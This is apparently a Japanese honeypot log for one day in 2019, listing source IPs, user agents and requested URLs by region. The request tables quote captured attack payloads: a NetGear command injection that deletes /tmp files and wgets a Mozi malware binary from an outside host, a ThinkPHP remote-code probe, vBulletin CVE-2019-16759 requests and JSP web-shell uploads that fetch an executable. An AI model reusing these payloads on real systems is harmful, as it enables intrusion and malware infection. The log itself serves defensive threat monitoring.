ハニーポット(仮) 観測記録 2019/10/03分です。
特徴
Region:AP
HiSilicon DVR Devicesの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
vBulletinの脆弱性(CVE-2019-16759)を狙うアクセス
phpMyAdminに対するスキャン行為
ZmEuによるスキャン行為
を確認しました。
Region:US
vBulletinの脆弱性(CVE-2019-16759)を狙うアクセス
を確認しました。
Region:EU
jspファイルを狙ったアクセス
5[.]188[.]210[.]101に関する不正通信
を確認しました。
他
アクセス数推移
AP:総アクセス数:39 (前日比:+9)
US:総アクセス数:16 (前日比:+10)
EU:総アクセス数:7 (前日比:-27)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 119.236.226.98 | Hong Kong |
3 | 124.251.44.18 | China |
1 | 139.227.154.99 | China |
1 | 185.128.41.50 | Switzerland |
2 | 185.31.163.237 | Russia |
1 | 195.209.47.134 | Russia |
1 | 200.68.113.212 | Argentina |
1 | 216.164.188.27 | United States |
6 | 221.126.40.214 | Hong Kong |
1 | 45.50.26.19 | United States |
1 | 60.191.52.254 | China |
1 | 66.249.66.92 | United States |
12 | 67.198.133.42 | United States |
7 | 93.174.93.178 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
3 | - |
7 | ApiTool |
5 | Googlebot/2.1 (+http://www.google.com/bot.html) |
2 | Hi |
1 | Mozilla/5.0 |
1 | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36 |
2 | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0 |
3 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0 |
12 | ZmEu |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | GET | /index.php | HTTP/1.1 |
2 | GET | ../../mnt/custom/ProductDefinition | HTTP |
2 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
2 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
2 | GET | /Pages/login.htm | HTTP/1.1 |
2 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
2 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
2 | GET | /pma/scripts/setup.php | HTTP/1.1 |
1 | GET | /robots.txt | HTTP/1.1 |
1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://139[.]227[.]154[.]99:49885/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.1 |
1 | GET | /shell?busybox | HTTP/1.1 |
1 | GET | /TP/index.php | HTTP/1.1 |
1 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | HTTP/1.1 |
1 | GET | /TP/public/index.php | HTTP/1.1 |
2 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
7 | HEAD | / | HTTP/1.1 |
2 | POST | /bbs/index.php?routestring=ajax/render/widget_php | HTTP/1.1 |
7 | POST | /editBlackAndWhiteList | HTTP/1.1 |
Region:US
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
1 | 112.120.195.195 | Hong Kong |
1 | 143.202.71.90 | Brazil |
1 | 185.128.41.50 | Switzerland |
2 | 185.31.163.237 | Russia |
1 | 201.145.69.113 | Mexico |
1 | 207.55.255.20 | United States |
1 | 45.141.84.18 | Russia |
2 | 78.128.113.46 | Bulgaria |
1 | 81.20.104.50 | Russia |
1 | 87.241.202.19 | Russia |
1 | 90.153.109.67 | Germany |
3 | 93.174.93.178 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
4 | - |
3 | ApiTool |
4 | Hi |
2 | Mozilla/5.0 |
1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.80 Safari/537.36 |
1 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 |
1 | python-requests/2.22.0 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | GET | /.git/config | HTTP/1.1 |
1 | GET | /index.php | HTTP/1.1 |
4 | GET | /Pages/login.htm | HTTP/1.1 |
2 | GET | /shell?busybox | HTTP/1.1 |
1 | GET | /wp-login.php | HTTP/1.1 |
2 | POST | /bbs/index.php?routestring=ajax/render/widget_php | HTTP/1.1 |
3 | POST | /editBlackAndWhiteList | HTTP/1.1 |
2 | \x03 |
Region:EU
送信元IPアドレス一覧
件数 | 送信元IPアドレス | 国 |
---|---|---|
4 | 1.119.136.198 | China |
1 | 5.188.210.101 | Russia |
2 | 93.174.93.178 | Netherlands |
UserAgent一覧
件数 | UserAgent |
---|---|
2 | ApiTool |
4 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) |
1 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 |
リクエスト内容一覧
件数 | Method | Request | Protocol |
---|---|---|---|
1 | GET | /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fky[.]dfg45dfg45[.]best/download.exe | HTTP/1.1 |
1 | GET | http://5[.]188[.]210[.]101/echo.php | HTTP/1.1 |
2 | POST | /editBlackAndWhiteList | HTTP/1.1 |
1 | PUT | /FxCodeShell.jsp%20 | HTTP/1.1 |
1 | PUT | /FxCodeShell.jsp::$DATA | HTTP/1.1 |
1 | PUT | /FxCodeShell.jsp/ | HTTP/1.1 |